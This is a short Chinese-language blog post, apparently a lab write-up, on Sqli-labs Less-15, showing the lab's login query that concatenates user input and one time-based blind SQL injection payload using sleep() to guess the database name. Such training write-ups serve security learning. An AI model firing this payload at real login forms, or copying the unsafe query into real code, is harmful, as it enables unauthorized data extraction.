Sqli-labs Less-15 延时注入

本关没有错误提示,那么我们只能靠猜测进行注入。这里我直接从源代码中看到了sql语句

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

那这里对id进行 'id' 的处理。

本关我们可以利用布尔注入和延时注入进行。

下面我们来演示一下延时注入。

猜测数据库名第一位:

uname=admin' and if(ascii(substr(database(),1,1))=115,sleep(5),1)#&passwd=11&submit=Submit

正确的时候延时5秒,不正确的时候直接登录。

其他的payload可参考less5自行构造。

posted @ 2020-04-09 21:57  zhengna  阅读(478)  评论(0编辑  收藏  举报